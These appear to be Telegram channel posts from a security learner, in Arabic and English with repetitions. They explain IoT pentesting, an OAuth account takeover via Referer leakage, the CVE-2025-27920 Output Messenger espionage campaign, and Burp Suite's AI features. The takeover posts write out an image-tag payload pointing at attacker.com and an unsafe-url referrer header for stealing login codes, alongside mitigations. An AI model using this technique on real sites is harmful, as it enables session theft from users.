Hey my friend, how are you doing?
I know I’ve been away for a while and Black has been taking my place, but I promise I’ll be back fully after I finish my exams and studies — things have just been a bit hectic.
I know I’ve been away for a while and Black has been taking my place, but I promise I’ll be back fully after I finish my exams and studies — things have just been a bit hectic.
Today’s topic is about IoT! 🚗
So listen, my friend — IoT started back in the 1990s, specifically in 1999, which is in the 21st century.
It all began with engineer Kevin Ashton, who was working at P&G.
Kevin was trying to find a way to connect devices to the internet — basically, making things communicate through the web.
He suggested using RFID, and from there, the idea of connecting objects to the internet really took off.
Did he succeed?
Yes, he succeeded in establishing the core idea, and he had a major impact on developing RFID. He even said his famous quote:
> "The Internet of Things has the potential to change the world, just as the Internet did. Maybe even more so."
So, is there a connection between IoT and Cybersecurity?
Absolutely — and that track is called:
> IoT Pentesting
In this track, you need to learn about hardware, networking, and devices — just like you would with software.
You’ll also need to understand protocols like:
MQTT
CoAP
BLE
Zigbee
And you definitely need to take a course on Hardware Hacking.
Here’s a great free course:
https://www.classcentral.com/course/youtube-levelup-0x02-hardware-hacking-101-179440
Class Central
Free Video: Hardware Hacking 101 from Bugcrowd | Class Central
Introduction to hardware hacking for web and mobile security professionals, covering essential tools, techniques, and protocols like UART, SPI, and JTAG. Hands-on examples and practical insights for beginners.
2025/5/12
------------------
شات بين بلاك و سبايدر *
بلاك : اخبارك يا سبايدر
سبايدر : في ثغره غريبه حصلت عندي
بلاك : اي هيا
سبايدر : فجاه شخص غريب دخل عندي علي حساب و انا فاتح من كروم
بلاك : شكلك مش شوفت مقال سبايدر سيك عنو
سبايدر : وريني كد ؟
----------------------------------------------------
ازيك يعزيزي عامل اي 🤖❤️
عنوان المقال :
Zero day account takeover
بص يعزيزي المقال دا قالب الدنيا ف التيم لاين لاجنبي و حبيت اشارك معكم بل عربي ف ياريت تشير المحتوي و القناه ❤️
في سنه 2025 شهر 5 الي هو شهر عيد ميلادي 😂❤️
ظهر ثغره تم تبليغه علي هكر ون الثغره بعنوان
الثغره تعتبر خطيره من نوع Critical
و تنصيفها عالي علي هكر ون
بتشتغل ازاي دي يسبايدر ؟
ببساطه الثغره بتستهدف
( session hijacking )
و بتشتغل عن طريق وضع بايلود في
<img>
واحد في html و عن طريقو يقدر يعمل هجوم OAuth code و يسرق جلسه المستخدم و يعمل takeover
ببساطه المخترق بيدمج ما بين هجومين
( OAUTH Flow )
و
( Referrer Policy Manipulation )
عن طريق img زي ما قولنا و الي بيحصل انه بيتسرب
Tokens او codes
الخاصه ب الجلسه تحديدا جلسه تسجيل الدخول
ببساطه ال
( OAUTH )
بتشتغل عن طريق تسجيلك في موقع زي جوجل مثلا المتصفح بتاعك بيروح علي صفحه تسجيل الدخول الخاصه ب جوجل و بعد ما المستخدم يسجل دخول ...
يبعت المتصفح بتاعو
( authorization code )
في رابط رجعو بتاع url يقوم الموقع لاصلي مبدلو بل access token
* مثال *
طيب اي دخل ال referrer head و police ؟
دخلهم انهم بيتم فيهم الثغره في حال عدم حمايه ليهم بشكل كويس
* مثال *
كل دا كان بدايه لي شرح الهجوم الهجوم بيتم عن طريق ان المهاجم بيجي بجهاز السيرفر بتاعو تحديدا ب استخدام
( index.php )
السيرفر بتاعو فيدتو انو لما يبعت صوره imp.png مثلا تكون صوره pixel 1x1
"صوره شفافه" طب و بعدين يضيف في الطلب
عشان يخلي الموقع لو حد طلب الصورة دي من موقعك ابعت الـ referrer كامل بالـ URL وكل الـ query parameters
طيب ازاي بيتم استغلال ؟
المهاجم بعد ما بيعمل كد بينتظر لحد ما يجي عندو صفحه فيها مثلا htmli بيكون فيها xss بس مش بل كامل يقدر يضيف img و يحقن الكود بشكل دا
و بعدها الضحيه يجي يسجل الدخول و يتحول علي redirect_uri وهو بيتحول الموقع بيفتح ملف img الي محطوط في السيرفر ملغم و بعدها المتصفح بيطلب الصورة دي ويرسل كامل الـ URL كـ referrer بسبب الهيدر اللي رجعه المهاجم في أول استجابة بعدها المهاجم يلقط الكود الموجود في الـ referrer، ويسرق الجلسة
طيب اي نقاط قوه الهجوم ؟
يعتمد على XSS.
لا يعتمد على Open Redirect
لا يحتاج حتى تنفيذ JavaScript
يعتمد على ثغرة في الـ browser behavior (المتصفح نفسه)
طيب اي الحمايه ؟
لا تستخدم query parameters لتخزين بيانات حساسة زي OAUTH codes، خصوصًا لو في خطر إنه يتم تحميل صور من مصادر غير موثوقة
لو انت صاحب الموقع استخدم referrer-policy كويسه زي
strict-origin-when-cross-origin
أو
no-referrer
أمن صفحاتك ضد HTML injection، مش بس XSS.
لو عندك OAUTH flow، اربط الكود بعنوان الـ IP أو session المؤقتة وما تسمحش بإعادة استخدامه
مصدر :
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
------------------
شات بين بلاك و سبايدر *
بلاك : اخبارك يا سبايدر
سبايدر : في ثغره غريبه حصلت عندي
بلاك : اي هيا
سبايدر : فجاه شخص غريب دخل عندي علي حساب و انا فاتح من كروم
بلاك : شكلك مش شوفت مقال سبايدر سيك عنو
سبايدر : وريني كد ؟
----------------------------------------------------
ازيك يعزيزي عامل اي 🤖❤️
عنوان المقال :
Zero day account takeover
بص يعزيزي المقال دا قالب الدنيا ف التيم لاين لاجنبي و حبيت اشارك معكم بل عربي ف ياريت تشير المحتوي و القناه ❤️
في سنه 2025 شهر 5 الي هو شهر عيد ميلادي 😂❤️
ظهر ثغره تم تبليغه علي هكر ون الثغره بعنوان
Account takeover with on line html
الثغره تعتبر خطيره من نوع Critical
و تنصيفها عالي علي هكر ون
بتشتغل ازاي دي يسبايدر ؟
ببساطه الثغره بتستهدف
( session hijacking )
و بتشتغل عن طريق وضع بايلود في
<img>
واحد في html و عن طريقو يقدر يعمل هجوم OAuth code و يسرق جلسه المستخدم و يعمل takeover
ببساطه المخترق بيدمج ما بين هجومين
( OAUTH Flow )
و
( Referrer Policy Manipulation )
عن طريق img زي ما قولنا و الي بيحصل انه بيتسرب
Tokens او codes
الخاصه ب الجلسه تحديدا جلسه تسجيل الدخول
ببساطه ال
( OAUTH )
بتشتغل عن طريق تسجيلك في موقع زي جوجل مثلا المتصفح بتاعك بيروح علي صفحه تسجيل الدخول الخاصه ب جوجل و بعد ما المستخدم يسجل دخول ...
يبعت المتصفح بتاعو
( authorization code )
في رابط رجعو بتاع url يقوم الموقع لاصلي مبدلو بل access token
* مثال *
https://example.com/callback?code=abc123xyz
طيب اي دخل ال referrer head و police ؟
دخلهم انهم بيتم فيهم الثغره في حال عدم حمايه ليهم بشكل كويس
* مثال *
Referer: https://secure.site.com/auth?code=abc123
كل دا كان بدايه لي شرح الهجوم الهجوم بيتم عن طريق ان المهاجم بيجي بجهاز السيرفر بتاعو تحديدا ب استخدام
( index.php )
السيرفر بتاعو فيدتو انو لما يبعت صوره imp.png مثلا تكون صوره pixel 1x1
"صوره شفافه" طب و بعدين يضيف في الطلب
Referrer-Policy: unsafe-url
عشان يخلي الموقع لو حد طلب الصورة دي من موقعك ابعت الـ referrer كامل بالـ URL وكل الـ query parameters
طيب ازاي بيتم استغلال ؟
المهاجم بعد ما بيعمل كد بينتظر لحد ما يجي عندو صفحه فيها مثلا htmli بيكون فيها xss بس مش بل كامل يقدر يضيف img و يحقن الكود بشكل دا
img src="https://attacker.com/img.png" />
و بعدها الضحيه يجي يسجل الدخول و يتحول علي redirect_uri وهو بيتحول الموقع بيفتح ملف img الي محطوط في السيرفر ملغم و بعدها المتصفح بيطلب الصورة دي ويرسل كامل الـ URL كـ referrer بسبب الهيدر اللي رجعه المهاجم في أول استجابة بعدها المهاجم يلقط الكود الموجود في الـ referrer، ويسرق الجلسة
طيب اي نقاط قوه الهجوم ؟
يعتمد على XSS.
لا يعتمد على Open Redirect
لا يحتاج حتى تنفيذ JavaScript
يعتمد على ثغرة في الـ browser behavior (المتصفح نفسه)
طيب اي الحمايه ؟
لا تستخدم query parameters لتخزين بيانات حساسة زي OAUTH codes، خصوصًا لو في خطر إنه يتم تحميل صور من مصادر غير موثوقة
لو انت صاحب الموقع استخدم referrer-policy كويسه زي
strict-origin-when-cross-origin
أو
no-referrer
أمن صفحاتك ضد HTML injection، مش بس XSS.
لو عندك OAUTH flow، اربط الكود بعنوان الـ IP أو session المؤقتة وما تسمحش بإعادة استخدامه
مثال واقعي للهجوم خطوة بخطوة:
1. الضحية يروح يسجل دخول من https://secure.site.com/auth?code=abc123.
2. المتصفح يعرض صفحة فيها <img src="https://attacker.com/img.png" />.
3. المتصفح يبعت طلب للصورة دي ومعاه:
Referer: https://secure.site.com/auth?code=abc123
4. سيرفر المهاجم يسجل الكود abc123.
5. المهاجم يدخل به على الموقع، كأنه الضحية
مصدر :
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
❤2
2025/5/12
Chat between Black and Spider
Black: What’s up, Spider?
Spider: I just encountered a weird vulnerability.
Black: What is it?
Spider: Out of nowhere, someone managed to log into my account while I was browsing with Chrome.
Black: Sounds like you haven’t seen SpiderSec’s post about it.
Spider: Show me then?
---
Hey my friend, how are you doing? 🤖❤️
Article Title:
Zero Day Account Takeover
Look my friend, this article shook the English cybersecurity timeline, so I thought I’d share it with you in Arabic—please share the content and the channel if you find it useful ❤️
In May 2025, which is also my birthday month 😂❤️
A vulnerability was reported on HackerOne titled:
“Account takeover with only inline HTML”
This vulnerability is considered critical and has a high severity rating on HackerOne.
---
So how does this work, Spider?
Simply put, the vulnerability targets:
Session Hijacking
It works by placing a payload inside an <img> element in HTML. This is then used to launch an OAuth code attack to steal the user's session and take over the account.
The attacker combines two techniques:
1. OAuth Flow
2. Referrer Policy Manipulation
Using an <img> tag as the weapon, what happens is:
Session tokens or login codes are leaked, allowing account takeover.
---
OAuth Flow explained simply:
OAuth works like this:
You try to sign in with a service like Google.
Your browser redirects you to Google’s login page.
Once logged in, Google sends back an authorization code in the redirect URL.
The original site then exchanges this code for an access token.
Example:
https://example.com/callback?code=abc123xyz
---
What’s the role of Referrer headers and policies?
They’re where the vulnerability lies—if not properly protected.
Example:
Referer: https://secure.site.com/auth?code=abc123
---
This is where the attack begins:
The attacker sets up a server—specifically with an index.php file.
The server returns a small 1x1 transparent image, like img.png.
But here's the trick—it includes this header:
Referrer-Policy: unsafe-url
This tells the browser:
“If anyone loads this image from your site, send the full referrer URL including query parameters.”
---
So how is it exploited?
1. The attacker finds a page with HTML injection (not full XSS—just enough to inject an <img>).
2. He injects this tag:
<img src="https://attacker.com/img.png" />
3. The victim signs in using OAuth and gets redirected to a redirect_uri that contains the code in the URL.
4. Before the redirect completes, the browser loads the attacker’s <img> tag.
5. The browser sends a request to the attacker’s server, including the full URL as a Referer header (with the code).
6. The attacker captures the code and uses it to hijack the session.
---
Strengths of the attack:
Does not rely on Open Redirect.
Does not require JavaScript execution.
Exploits browser behavior itself.
Works with only HTML injection, not full XSS.
---
How to protect against it?
Never store sensitive OAuth codes in query parameters—especially if there's a chance of third-party image loading.
Use a secure referrer-policy like:
strict-origin-when-cross-origin
no-referrer
Harden your pages against HTML injection, not just XSS.
For OAuth flows, tie the code to an IP address or temporary session, and don’t allow reuse.
---
Realistic step-by-step attack:
1. Victim signs in from:
https://secure.site.com/auth?code=abc123
2. The site includes:
<img src="https://attacker.com/img.png" />
3. The browser sends:
Referer: https://secure.site.com/auth?code=abc123
4. The attacker’s server logs the code=abc123.
5. Attacker uses the code to log in as the victim.
---
Source:
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
Chat between Black and Spider
Black: What’s up, Spider?
Spider: I just encountered a weird vulnerability.
Black: What is it?
Spider: Out of nowhere, someone managed to log into my account while I was browsing with Chrome.
Black: Sounds like you haven’t seen SpiderSec’s post about it.
Spider: Show me then?
---
Hey my friend, how are you doing? 🤖❤️
Article Title:
Zero Day Account Takeover
Look my friend, this article shook the English cybersecurity timeline, so I thought I’d share it with you in Arabic—please share the content and the channel if you find it useful ❤️
In May 2025, which is also my birthday month 😂❤️
A vulnerability was reported on HackerOne titled:
“Account takeover with only inline HTML”
This vulnerability is considered critical and has a high severity rating on HackerOne.
---
So how does this work, Spider?
Simply put, the vulnerability targets:
Session Hijacking
It works by placing a payload inside an <img> element in HTML. This is then used to launch an OAuth code attack to steal the user's session and take over the account.
The attacker combines two techniques:
1. OAuth Flow
2. Referrer Policy Manipulation
Using an <img> tag as the weapon, what happens is:
Session tokens or login codes are leaked, allowing account takeover.
---
OAuth Flow explained simply:
OAuth works like this:
You try to sign in with a service like Google.
Your browser redirects you to Google’s login page.
Once logged in, Google sends back an authorization code in the redirect URL.
The original site then exchanges this code for an access token.
Example:
https://example.com/callback?code=abc123xyz
---
What’s the role of Referrer headers and policies?
They’re where the vulnerability lies—if not properly protected.
Example:
Referer: https://secure.site.com/auth?code=abc123
---
This is where the attack begins:
The attacker sets up a server—specifically with an index.php file.
The server returns a small 1x1 transparent image, like img.png.
But here's the trick—it includes this header:
Referrer-Policy: unsafe-url
This tells the browser:
“If anyone loads this image from your site, send the full referrer URL including query parameters.”
---
So how is it exploited?
1. The attacker finds a page with HTML injection (not full XSS—just enough to inject an <img>).
2. He injects this tag:
<img src="https://attacker.com/img.png" />
3. The victim signs in using OAuth and gets redirected to a redirect_uri that contains the code in the URL.
4. Before the redirect completes, the browser loads the attacker’s <img> tag.
5. The browser sends a request to the attacker’s server, including the full URL as a Referer header (with the code).
6. The attacker captures the code and uses it to hijack the session.
---
Strengths of the attack:
Does not rely on Open Redirect.
Does not require JavaScript execution.
Exploits browser behavior itself.
Works with only HTML injection, not full XSS.
---
How to protect against it?
Never store sensitive OAuth codes in query parameters—especially if there's a chance of third-party image loading.
Use a secure referrer-policy like:
strict-origin-when-cross-origin
no-referrer
Harden your pages against HTML injection, not just XSS.
For OAuth flows, tie the code to an IP address or temporary session, and don’t allow reuse.
---
Realistic step-by-step attack:
1. Victim signs in from:
https://secure.site.com/auth?code=abc123
2. The site includes:
<img src="https://attacker.com/img.png" />
3. The browser sends:
Referer: https://secure.site.com/auth?code=abc123
4. The attacker’s server logs the code=abc123.
5. Attacker uses the code to log in as the victim.
---
Source:
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
⚡1
محتوي المره الجايه : Next time content
Anonymous Poll
75%
الفريق الهجومي : Offensive team
0%
الفريق الدفاعي : defensive team
25%
ذكاء اصطناعي : Ai
0%
فكره جديده اكتبها في التعليقات
0%
New idea, write it in the comments
Forwarded from 『Clippy』
الفرق بين كود مبرمج بايثون محترف
و مبرمج بايثون مبتدئ
لو عايز تقول مثلًا:
city's temp is 34
بالمبتدئ:
بالمحترف:
النتيجة:
Cairo's temp is 34
شايف الفرق في الكود التاني ؟ الكود بقى أنضف وأسهل في القراءة.
ده طبعا مثال بسيط بيكون باين اكتر لو عامل بروجكت كبير
المبرمج المحترف بيستخدم طرق زي
لاكن دي برضه طريقه قديمه شويه
في حاليا طرق زي
زي اول مثال فوق.
الفرق بين المبتدئ والمحترف مش في الأدوات، بل في طريقة الاستخدام.
و مبرمج بايثون مبتدئ
لو عايز تقول مثلًا:
city's temp is 34
بالمبتدئ:
city = "Cairo"
temp = 34
print(city, "'s temp is", temp)
بالمحترف:
city = "Cairo"
temp = 34
print(f"{city}'s temp is {temp}")
النتيجة:
Cairo's temp is 34
شايف الفرق في الكود التاني ؟ الكود بقى أنضف وأسهل في القراءة.
ده طبعا مثال بسيط بيكون باين اكتر لو عامل بروجكت كبير
المبرمج المحترف بيستخدم طرق زي
Format
print("{}'s temp is {}".format(city, temp))
لاكن دي برضه طريقه قديمه شويه
في حاليا طرق زي
2. استخدام f-strings
(من بايثون 3.6 وطالع):
python
print(f"{city}'s temp is {temp}")
زي اول مثال فوق.
الخلاصة:
الفرق بين المبتدئ والمحترف مش في الأدوات، بل في طريقة الاستخدام.
عزيزي اخبارك اي 🙈❤️
عايز اقولك قبل ما نبداء شكرا علي دعم رهيب و كل ما دعم كان احسن كل ما كنا احسن و احسن ✨
موضوع المقال :
في صباح اليوم الي هو النهارده بتاريخ
حصل اختراق علي مجموعه حساسه و مهمه في العراق عن طريق مجموعه اسمه
دول يعزيزي مجموعه مدعومه من تركيا هدفها التجسس و ليهم اسماء تانيه زي
Cosmic Wolf، Sea Turtle، Teal Kurma، UNC1326
المهم الهجوم بداء من شهر ابريل عام 2024 لحد وقت كتابه المقال
حصل انهم اكتشفو ثغره في برنامج
من اول اصدار 2.0.62 و الي قبلو
اكتشفو استغلال لي cve تحديدا
ال cve بيتم عن طريق ثغره اسمه
الوصف الفني : تسمح للمهاجم عن بُعد و بعد المصادقة بالوصول إلى ملفات النظام أو تنفيذ ملفات غير مصرح بها عبر السيرفر من خلال استغلال ضعف في التحقق من المسارات داخل تطبيق إدارة السيرفر (Server Manager)
و درجه الخطوره معديه 7.5 يعني اعلي من 7.5
( لم يتم نشر تقييم CVSS الرسمي بعد )
بس انا قولت اخمنها يعني 😂
طريقة الاستغلال :
1. الوصول إلى السيرفر كـ"مستخدم مصادق".
2. استغلال ضعف التحقق من مسارات الملفات.
3. إسقاط ملفات ضارة داخل مجلد بدء التشغيل الخاص بالسيرفر، مثل:
OM.vbs
OMServerService.vbs
OMServerService.exe
(backdoor مكتوب بلغة Go)
لاثر لامني :
1 : RCE
2 : Backdoors
3 : Credentials
4 : C2 Servers
مثلا
api.wordinfos[.]com
5 : information disclosure
الملفات الخبيثة :
OM.vbs : سكربت مسؤول عن تشغيل باقي الملفات.
OMServerService.vbs : سكربت يُشغّل الباك دور.
OMServerService.exe : Backdoor بلغة Golang للاتصال بـ C2.
OMClientService.exe : Backdoor يُستخدم في جانب الضحية (client).
الخطوات الموصى بها للحماية :
1. تحديث البرنامج إلى الإصدار 2.0.63 أو أحدث فورًا.
2. مراقبة الاتصالات الصادرة إلى api.wordinfos[.]com.
3. فحص ملفات OM*.vbs و OM*.exe داخل مجلدات بدء التشغيل.
4. مراجعة سجلات الدخول (logs) لاكتشاف أي استخدام مشبوه.
5. تطبيق عزل الشبكة (Segmentation) على الخوادم الحساسة.
هتسالني اي دخل العراق فل موضوع ؟
هرد عليك ببساطه يعزيزي انهم كانو مستهدفين من المجموعه التركيا
لاشخاص المستهدفه كانو زي
يعني :
المجموعة كانت تستهدف مستخدمين أكراد داخل العراق
(أفراد من الجيش أو الأمن أو الإدارات الكردية)
الأهداف لم تكن عامة، بل مركزة ضمن حملة تجسس إلكتروني
و شكرا علي قرائه المقال 🤍✨
مصدر :
https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
عايز اقولك قبل ما نبداء شكرا علي دعم رهيب و كل ما دعم كان احسن كل ما كنا احسن و احسن ✨
موضوع المقال :
هجوم حصل علي عراق ( zero day )
في صباح اليوم الي هو النهارده بتاريخ
2025/5/13
حصل اختراق علي مجموعه حساسه و مهمه في العراق عن طريق مجموعه اسمه
Marbled Dust
دول يعزيزي مجموعه مدعومه من تركيا هدفها التجسس و ليهم اسماء تانيه زي
Cosmic Wolf، Sea Turtle، Teal Kurma، UNC1326
المهم الهجوم بداء من شهر ابريل عام 2024 لحد وقت كتابه المقال
حصل انهم اكتشفو ثغره في برنامج
Output Messenger
من اول اصدار 2.0.62 و الي قبلو
اكتشفو استغلال لي cve تحديدا
CVE-2025-27920
ال cve بيتم عن طريق ثغره اسمه
Directory Traversal Vulnerability
الوصف الفني : تسمح للمهاجم عن بُعد و بعد المصادقة بالوصول إلى ملفات النظام أو تنفيذ ملفات غير مصرح بها عبر السيرفر من خلال استغلال ضعف في التحقق من المسارات داخل تطبيق إدارة السيرفر (Server Manager)
و درجه الخطوره معديه 7.5 يعني اعلي من 7.5
( لم يتم نشر تقييم CVSS الرسمي بعد )
بس انا قولت اخمنها يعني 😂
طريقة الاستغلال :
1. الوصول إلى السيرفر كـ"مستخدم مصادق".
2. استغلال ضعف التحقق من مسارات الملفات.
3. إسقاط ملفات ضارة داخل مجلد بدء التشغيل الخاص بالسيرفر، مثل:
OM.vbs
OMServerService.vbs
OMServerService.exe
(backdoor مكتوب بلغة Go)
لاثر لامني :
1 : RCE
2 : Backdoors
3 : Credentials
4 : C2 Servers
مثلا
api.wordinfos[.]com
5 : information disclosure
الملفات الخبيثة :
OM.vbs : سكربت مسؤول عن تشغيل باقي الملفات.
OMServerService.vbs : سكربت يُشغّل الباك دور.
OMServerService.exe : Backdoor بلغة Golang للاتصال بـ C2.
OMClientService.exe : Backdoor يُستخدم في جانب الضحية (client).
الخطوات الموصى بها للحماية :
1. تحديث البرنامج إلى الإصدار 2.0.63 أو أحدث فورًا.
2. مراقبة الاتصالات الصادرة إلى api.wordinfos[.]com.
3. فحص ملفات OM*.vbs و OM*.exe داخل مجلدات بدء التشغيل.
4. مراجعة سجلات الدخول (logs) لاكتشاف أي استخدام مشبوه.
5. تطبيق عزل الشبكة (Segmentation) على الخوادم الحساسة.
هتسالني اي دخل العراق فل موضوع ؟
هرد عليك ببساطه يعزيزي انهم كانو مستهدفين من المجموعه التركيا
لاشخاص المستهدفه كانو زي
أشخاصًا مرتبطين بالقوات الكردية العاملة في العراق
يعني :
المجموعة كانت تستهدف مستخدمين أكراد داخل العراق
(أفراد من الجيش أو الأمن أو الإدارات الكردية)
الأهداف لم تكن عامة، بل مركزة ضمن حملة تجسس إلكتروني
و شكرا علي قرائه المقال 🤍✨
مصدر :
https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
Zero-Day Attack Targets Sensitive Kurdish Entities in Iraq – CVE-2025-27920 Analysis
Date: May 13, 2025
Author: Mohamed Ahmed Abo El-Yazid
---
Dear friend,
Before we begin—thank you for the incredible support. The better the support, the better we become together.
---
Overview of the Attack
On the morning of May 13, 2025, a cyber espionage attack targeting sensitive and critical entities in Iraq was uncovered. The threat actor behind the operation is a Türkiye-affiliated group known as:
Marbled Dust
Also known as: Cosmic Wolf, Sea Turtle, Teal Kurma, UNC1326
This campaign has reportedly been active since April 2024.
---
Vulnerability Information
The attackers exploited a zero-day vulnerability in the enterprise communication platform Output Messenger, specifically affecting versions 2.0.62 and earlier.
CVE: CVE-2025-27920
Type: Directory Traversal Vulnerability
Affected Component: Server Manager application
Risk Level (estimated): 7.5+ (pending CVSS official rating)
Technical Description:
This vulnerability allows authenticated remote attackers to access system files or execute unauthorized scripts by exploiting weak path validation logic inside the Output Messenger Server Manager.
---
Attack Chain Breakdown
1. Initial Access:
Attacker gains access to Output Messenger Server as an authenticated user (possibly via DNS hijacking or typosquatting to steal credentials).
2. Exploitation:
Using CVE-2025-27920, the attacker drops malicious payloads in critical folders like the server startup directory and the Public/Videos folder.
3. Payloads Used:
OM.vbs: Executes other malicious files.
OMServerService.vbs: Triggers the Golang backdoor.
OMServerService.exe: A Golang-based backdoor.
OMClientService.exe: Another Golang backdoor that runs on client devices.
---
Observed Impact
Remote Code Execution (RCE)
Credential Theft
Persistence via Startup Scripts
Backdoor Installation
Communication with C2 server:
api.wordinfos[.]com
Information Disclosure
---
Recommended Mitigations
1. Update Output Messenger to version 2.0.63 or later.
2. Monitor outbound traffic for suspicious domains like api.wordinfos[.]com.
3. Scan startup folders for files named OM*.vbs or OM*.exe.
4. Audit server access logs for any unusual login activity.
5. Apply network segmentation for critical servers.
---
Why Iraq Was Targeted
You may wonder: what does Iraq have to do with this attack?
The answer is simple. The attack specifically targeted Kurdish individuals and entities in Iraq, likely including:
Members of the Kurdish military
Security forces
Administrative organizations
This campaign was not random — it was part of a targeted cyber espionage operation aimed at Kurdish users of Output Messenger operating within Iraq.
Source :
https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
Date: May 13, 2025
Author: Mohamed Ahmed Abo El-Yazid
---
Dear friend,
Before we begin—thank you for the incredible support. The better the support, the better we become together.
---
Overview of the Attack
On the morning of May 13, 2025, a cyber espionage attack targeting sensitive and critical entities in Iraq was uncovered. The threat actor behind the operation is a Türkiye-affiliated group known as:
Marbled Dust
Also known as: Cosmic Wolf, Sea Turtle, Teal Kurma, UNC1326
This campaign has reportedly been active since April 2024.
---
Vulnerability Information
The attackers exploited a zero-day vulnerability in the enterprise communication platform Output Messenger, specifically affecting versions 2.0.62 and earlier.
CVE: CVE-2025-27920
Type: Directory Traversal Vulnerability
Affected Component: Server Manager application
Risk Level (estimated): 7.5+ (pending CVSS official rating)
Technical Description:
This vulnerability allows authenticated remote attackers to access system files or execute unauthorized scripts by exploiting weak path validation logic inside the Output Messenger Server Manager.
---
Attack Chain Breakdown
1. Initial Access:
Attacker gains access to Output Messenger Server as an authenticated user (possibly via DNS hijacking or typosquatting to steal credentials).
2. Exploitation:
Using CVE-2025-27920, the attacker drops malicious payloads in critical folders like the server startup directory and the Public/Videos folder.
3. Payloads Used:
OM.vbs: Executes other malicious files.
OMServerService.vbs: Triggers the Golang backdoor.
OMServerService.exe: A Golang-based backdoor.
OMClientService.exe: Another Golang backdoor that runs on client devices.
---
Observed Impact
Remote Code Execution (RCE)
Credential Theft
Persistence via Startup Scripts
Backdoor Installation
Communication with C2 server:
api.wordinfos[.]com
Information Disclosure
---
Recommended Mitigations
1. Update Output Messenger to version 2.0.63 or later.
2. Monitor outbound traffic for suspicious domains like api.wordinfos[.]com.
3. Scan startup folders for files named OM*.vbs or OM*.exe.
4. Audit server access logs for any unusual login activity.
5. Apply network segmentation for critical servers.
---
Why Iraq Was Targeted
You may wonder: what does Iraq have to do with this attack?
The answer is simple. The attack specifically targeted Kurdish individuals and entities in Iraq, likely including:
Members of the Kurdish military
Security forces
Administrative organizations
This campaign was not random — it was part of a targeted cyber espionage operation aimed at Kurdish users of Output Messenger operating within Iraq.
Source :
https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
محتوي المره الجايه : Next time content
Anonymous Poll
82%
Red team : فريق لاحمر
9%
Blue team : فريق لازرق
9%
Ai : ذكاء اصطناعي
حابب اقول نقطه مهمه انا لما انشر مقال او فيديو و انشرو فكل مكان ف دا بسبب اني بكون عايز الناس تتعلم صح و نكون زي لاجانب او افضل عشان في ناس مفكره اني لما انشر البوست ف قناه شخص يبقي انا معا فل قناه او شئ لا انا لما انشرو بنشرو بنيه علم ينفع الناس و شكرا
(◍•ᴗ•◍)❤
----------------------------------------------------
I want to share an important point:
Whenever I publish an article or video and share it everywhere, it's because I genuinely want people to learn the right way and for us to be as good as—if not better than—others around the world.
Some people may think that when I share a post on someone else's channel, it means I’m part of that channel or working with them. But that’s not the case.
I share with the intention of spreading knowledge that benefits people.
Thank you so much!
(◍•ᴗ•◍)❤
(◍•ᴗ•◍)❤
----------------------------------------------------
I want to share an important point:
Whenever I publish an article or video and share it everywhere, it's because I genuinely want people to learn the right way and for us to be as good as—if not better than—others around the world.
Some people may think that when I share a post on someone else's channel, it means I’m part of that channel or working with them. But that’s not the case.
I share with the intention of spreading knowledge that benefits people.
Thank you so much!
(◍•ᴗ•◍)❤
❤1
﴿يَا أَيُّهَا الَّذِينَ آمَنُوا اتَّقُوا اللَّهَ وَقُولُوا قَوْلًا سَدِيدًا﴾
❤3
شات بين بلاك و سبايدر 👥
بلاك : الحق البرب سويت اضاف فيها ذكاء اصطناعي
سبايدر : عارف دي قديمه بس مش عارف استخدمها
بلاك : شوفت مقال سبايدر سيك ؟
سبايدر : لا
بلاك : طب شوف كد
----------------------------------------------------
عزيزي القارئ اهلا بيك في مقال جديد ✨
عنوان المقال :
في تاريخ :
شركه portsawger المصنعه لي البرب سويت نزلت اول مقال ( " blog " )
عشان اضافه الذكاء الاصطناعي و هنا العالم اتقلب حرفيا
بداء يطلع مقارنات بين اده تانيه اسمه كايدو و البرب سويت بحكم ان لاتنين شغالين بذكاء اصطناعي
طيب يا سبايدر اي هيا البرب سويت ؟
البرب يعزيزي بختصار اده تقوم بقرائه الطلب و الرد الخاص بل موقع
اي دا بس كد ؟
شوفت ازاي يعزيزي و انت رايح شاري كورس 9 ساعات شرح البرب سويت
المهم اده البرب سويت مش شرط تعمل كد وبس لا هيا فيها اضافات تانيه زي مثلا
ودي بتعمل localhost علي خفيف بحيس انه تستقبل الطلبات و تشوف زي مثلا http او dns وقتها ممكن تكتشف ثغره
و اضافات تانيه كتير بس دا مش موضوع المقال
موضوعنا ان ازاي الشركه تضيف ai و ينجح النجاح الرهيب دا
طيب يا سبايدر انا عندي البرب سويت و مفيش كلام دا
مهو يعزيزي هو موجود بس في نسخه البرو و لاسوء من كد انو بفلوس في نسخه برو
يعني انا بعد ما اشتري النسخه البرو عشان ai القي ai بفلوس ؟
الحقيقه يعزيزي لا بس لو نزلتها كراك و انا مش انصح بدا اه
طيب اي فايده الذكاء الاصطناعي في البرب ؟
ببساطه تخفف عليك من حيث اكتشاف الدومينات و الثغرات
يعني انا ب دوسه واحده اقدر اعمل recon و كمان اكتشف الثغره !!!!
صحيح كلامك يعزيزي عشان كد هتلقي سعرها غالي شويه مقارنه بل عادي
دا غير ان في اضافات الي في
مجرد انك تكتب ai في سيرش هتلقي كل ادوات ai بدون نجوم
و دي هتطور الذكاء الاصطناعي يبقي اقوي بس مش تبقي اوفر فيها عشان هتلقي جهازك بقي ضعيف فل استخدام
طيب يا سبايدر لو انا عايز انزلها اجيبها ازاي ؟
اول حاجه يعزيزي و نصيحه اخويه ابعد عن اوتو ماشين غير لما تلقي نفسك متقن لي مانول
تاني حاجه هات ايميل جامعي و ادخل علي موقع بورت سويجر و سجل الجيميل هيجيلك مفتاح البرب سويت برو و معا
10,000
نقطه لي استخدام الذكاء الاصطناعي و عيش انت بقي 🤍
